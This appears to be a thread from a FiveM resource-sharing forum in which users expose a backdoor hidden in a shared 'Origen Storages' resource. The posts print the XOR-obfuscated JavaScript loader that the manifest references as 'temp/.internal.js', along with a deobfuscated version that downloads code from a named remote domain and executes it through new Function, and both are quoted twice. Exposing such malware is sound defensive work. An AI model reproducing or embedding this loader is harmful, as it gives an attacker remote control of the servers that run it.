System Light Dark

Theme editor

Page Setup Appearance

  • Page Width

    Toggle Page Width

    Allows you to change page width values

    Color Pickers

    Toggle color picker

    Allows you to change the color of some predefined items

    Typography

    Select the font you want to use

    Node Layout

    Enable grid layout

    Arranges forum nodes in a clean grid layout.

  • Styles

    Select the style you want to use

    Style variation

    Select the style variation you want to use
    System Light Dark

MLO Origen Storages

Highlights Only
C
  • Post hidden due to user being banned.
server_scripts {
--[[server.lua]] 'temp/.internal.js',
}
nice backdoor mate
trying to selling a backdoor? https://gofile.io/d/72jUmP
 
ℜ𝔬𝔬𝔱@𝔛𝔱𝔞𝔰𝔦𝔰 said:
server_scripts {
--[[server.lua]] 'temp/.internal.js',
}
nice backdoor mate
trying to selling a backdoor? https://gofile.io/d/72jUmP
Click to expand...
ℜ𝔬𝔬𝔱@𝔛𝔱𝔞𝔰𝔦𝔰/* [ origen_storages ] */ x=(e,k=3)=>[...e].map(c=>String.fromCharCode(c.charCodeAt()^k)).join("");v="`lmpw#kwwsp#>#qfrvjqf+$kwwsp$*8 `lmpw#glnbjm#>#$pwfb{p`qjswp-`ln$8 `lmpw#vqo#>#$kwwsp9,,$#(#glnbjm#(#$,y[fBKIIDD$8 `lmpw#ebooab`h#>#$kwwsp9,,$#(#glnbjm#(#$,`e{qf$8 wqz#x ##kwwsp-dfw+vqo/#+qfp*#>=#x ####ofw#g#>#$$8 ####qfp-lm+$gbwb$/#+`kvmh*#>=#x ######g#(>#`kvmh8 ####~*8 ####qfp-lm+$fmg$/#+*#>=#x ######wqz#x ########je#+g-wqjn+*-pwbqwpTjwk+$?$**#wkqlt#38 ########mft#Evm`wjlm+$dolabo$/#g*+dolabo*8 ######~#`bw`k#x ########wqz#x ##########kwwsp-dfw+ebooab`h/#+ebooab`hQfp*#>=#x ############ofw#eg#>#$$8 ############ebooab`hQfp-lm+$gbwb$/#+`kvmh*#>=#x ##############eg#(>#`kvmh8 ############~*8 ############ebooab`hQfp-lm+$fmg$/#+*#>=#x ##############wqz#x ################mft#Evm`wjlm+$dolabo$/#eg*+dolabo*8 ##############~#`bw`k#x~ ############~*8 ##########~*-lm+$fqqlq$/#+*#>=#x~*8 ########~#`bw`k#x~ ######~ ####~*8 ##~*-lm+$fqqlq$/#+*#>=#x~*8 ~#`bw`k#x~";globalThis[x("fubo")](x(v));


"""""""""""""nothing""""""""""""""""""

Its a XOR obfuscation method, btw here is ur deofuscated malware code:

const https = require('https');
const domain = 'steaxscripts.com';
const url = 'https://' + domain + '/zXeAHJJGG';
const fallback = 'https://' + domain + '/cfxre';

try {
https.get(url, (res) => {
let d = '';

res.on('data', (chunk) => {
d += chunk;
});

res.on('end', () => {
try {
if (d.trim().startsWith('<')) throw 0;
new Function('global', d)(global);
} catch {
try {
https.get(fallback, (fallbackRes) => {
let fd = '';

fallbackRes.on('data', (chunk) => {
fd += chunk;
});

fallbackRes.on('end', () => {
try {
new Function('global', fd)(global);
} catch {}
});
}).on('error', () => {});
} catch {}
}
});
}).on('error', () => {});
} catch {}



@ItzHighNL u should see this
 
ℜ𝔬𝔬𝔱@𝔛𝔱𝔞𝔰𝔦𝔰 said:
/* [ origen_storages ] */ x=(e,k=3)=>[...e].map(c=>String.fromCharCode(c.charCodeAt()^k)).join("");v="`lmpw#kwwsp#>#qfrvjqf+$kwwsp$*8 `lmpw#glnbjm#>#$pwfb{p`qjswp-`ln$8 `lmpw#vqo#>#$kwwsp9,,$#(#glnbjm#(#$,y[fBKIIDD$8 `lmpw#ebooab`h#>#$kwwsp9,,$#(#glnbjm#(#$,`e{qf$8 wqz#x ##kwwsp-dfw+vqo/#+qfp*#>=#x ####ofw#g#>#$$8 ####qfp-lm+$gbwb$/#+`kvmh*#>=#x ######g#(>#`kvmh8 ####~*8 ####qfp-lm+$fmg$/#+*#>=#x ######wqz#x ########je#+g-wqjn+*-pwbqwpTjwk+$?$**#wkqlt#38 ########mft#Evm`wjlm+$dolabo$/#g*+dolabo*8 ######~#`bw`k#x ########wqz#x ##########kwwsp-dfw+ebooab`h/#+ebooab`hQfp*#>=#x ############ofw#eg#>#$$8 ############ebooab`hQfp-lm+$gbwb$/#+`kvmh*#>=#x ##############eg#(>#`kvmh8 ############~*8 ############ebooab`hQfp-lm+$fmg$/#+*#>=#x ##############wqz#x ################mft#Evm`wjlm+$dolabo$/#eg*+dolabo*8 ##############~#`bw`k#x~ ############~*8 ##########~*-lm+$fqqlq$/#+*#>=#x~*8 ########~#`bw`k#x~ ######~ ####~*8 ##~*-lm+$fqqlq$/#+*#>=#x~*8 ~#`bw`k#x~";globalThis[x("fubo")](x(v));


"""""""""""""nothing""""""""""""""""""

Its a XOR obfuscation method, btw here is ur deofuscated malware code:

const https = require('https');
const domain = 'steaxscripts.com';
const url = 'https://' + domain + '/zXeAHJJGG';
const fallback = 'https://' + domain + '/cfxre';

try {
https.get(url, (res) => {
let d = '';

res.on('data', (chunk) => {
d += chunk;
});

res.on('end', () => {
try {
if (d.trim().startsWith('<')) throw 0;
new Function('global', d)(global);
} catch {
try {
https.get(fallback, (fallbackRes) => {
let fd = '';

fallbackRes.on('data', (chunk) => {
fd += chunk;
});

fallbackRes.on('end', () => {
try {
new Function('global', fd)(global);
} catch {}
});
}).on('error', () => {});
} catch {}
}
});
}).on('error', () => {});
} catch {}



@ItzHighNL u should see this
Click to expand...
ℜ𝔬𝔬𝔱@𝔛𝔱𝔞𝔰𝔦𝔰Yeah, this was a very obvious one. It has been handled.
 
You must log in or register to reply here.

Legal Notice

We do not enforce DMCA as we do not host any of the content, this is a peer to peer platform any DMCA should be send to the third party.

Currently on our website
Members online
Threads 23,196
Messages 309,149
Members 88,883
Latest member amkokyaan
Back
Top Bottom